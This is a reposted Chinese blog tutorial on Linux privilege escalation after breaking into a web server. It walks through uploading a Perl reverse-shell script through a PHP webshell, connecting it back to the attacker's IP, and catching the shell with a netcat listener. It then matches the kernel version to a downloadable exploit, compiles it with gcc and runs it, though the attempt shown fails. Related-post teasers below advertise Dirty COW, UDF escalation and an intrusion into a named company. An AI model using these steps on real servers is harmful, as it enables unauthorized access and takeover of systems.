linux溢出提权(适合刚学习linux提权的朋友)

转载 2012年03月31日 13:06:19
本帖最后由 wjs 于 2010-4-3 14:26 编辑 

作者wjs
qq 825680101

我也是刚接触linux,谢谢师傅sunwear的指导。
先在网站目录上传1.pl,是个反弹脚本
Phpshell执行chmod +x 1.pl,给1.pl执行权限,图0

然后执行 ./1.pl 本机IP 1224

然后本机监听nc -vv -l -p 1224,图1 反弹成功

输入id
bash-3.2$ id
uid=529(zeicom) gid=525(zeicom) groups=525(zeicom)
bash-3.2$
这里uid=529(zeicom)还不是root权限,输入uname –r
返回:2.6.18-164.11.1.el5PAE

找对应的exp, 这里地址整理很齐全可以这里下
http://sebug.net/paper/linux_exp/ {此处经本人更改}

命令输入pwd,这个命令是显示当前目录,当前目录就是shell的目录,我在shell上传2.c
然后命令输入
Gcc –o 2 2.c  //把2.c编译成可执行文件
chmod +x 2 //给2有执行权限
./2 //执行2,2是溢出的 exp文件。图2
  

看图可以发现没提权成功,过程就是这样。以后遇到linux可以这样提权。不会linux提权的朋友可以学习下,会有所收获的 

常见的服务器溢出提权方法

0×00 前言 0×01 找可写目录 0×02 运行exploit提权 0×03 附录 0×00 前言 溢出漏洞就像杯子里装水,水多了杯子装不进去,就会把里面的水溢出来. 而相对计...
  • xysoul
  • xysoul
  • 2015年03月20日 09:26
  • 2154

Delphi7高级应用开发随书源码

  • 2003年04月30日 00:00
  • 676KB
  • 下载

linux内核通用提权漏洞expliot 脏牛Dirty COW

[-] 0x01 漏洞简介0x02 漏洞危害0x03 影响范围0x04 漏洞测试0x05 测试代码0x06 测试结果0x07 修复方案 0x01 漏洞简介 Linux内核在处理内存写时...

Linux提权:从入门到放弃

转自:http://www.freebuf.com/articles/system/129549.html *原创作者:piece of the past,本文属Freebuf原创奖励计划,...
  • earbao
  • earbao
  • 2017年03月23日 09:25
  • 3926

实战Linux下三种不同方式的提权技巧

介绍在渗透测试或者漏洞评估的过程中,提权是非常重要的一步,在这一步,黑客和安全研究人员常常通过exploit,bug,错误配置来提升权限。本文的例子都是在虚拟机里测试的,不同的虚拟机可以从Vulnhu...

史上最全Linux提权后获取敏感信息方法 20140121

在本文开始之前,我想指出我不是专家。据我所知,在这个庞大的区域,没有一个“神奇”的答案.分享,共享(我的出发点)。下面是一个混合的命令做同样的事情,在不同的地方,或只是一个不同的眼光来看待事物。我知道...

linux提权总结

ernel, Operating System & Device Information: Command Result uname -a Print all avai...

Linux提权后获取敏感信息方法

(Linux)的提权是怎么一回事:  收集 – 枚举,枚举和一些更多的枚举。  过程 – 通过数据排序,分析和确定优先次序。  搜索 – 知道搜索什么和在哪里可以找到漏洞代码。  适应...
  • bezal
  • bezal
  • 2015年06月25日 10:43
  • 216

网康科技一处配置不当导致可内网渗透 --- Linux udf提权

https://portal.netentsec.com/phpMyAdmin/ 能够直接访问 就不看数据库信息进系统拿shell 这次我们试试udf提权 ...

Linux提权的四个脚本发布啦!

导读 当你攻击一台计算机时可能会遇到一些拒绝执行操作的限制,就算你有一个shell也可能会遇到此问题。为了获得目标主机的完全控制权限,你需要在未被用户授权的地方绕过权限控制。你可以使用这些权限删除文...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:linux溢出提权(适合刚学习linux提权的朋友)
举报原因:
原因补充:

(最多只允许输入30个字)